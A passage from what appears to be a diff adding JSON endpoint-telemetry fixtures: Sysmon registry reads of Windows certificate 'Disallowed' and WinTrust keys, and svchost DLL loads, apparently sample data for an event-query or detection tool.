+ "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "npmproxy.dll", + "image_path": "C:\\Windows\\System32\\npmproxy.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bitsigd.dll", + "image_path": "C:\\Windows\\System32\\bitsigd.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + 
"timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "upnp.dll", + "image_path": "C:\\Windows\\System32\\upnp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 
131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 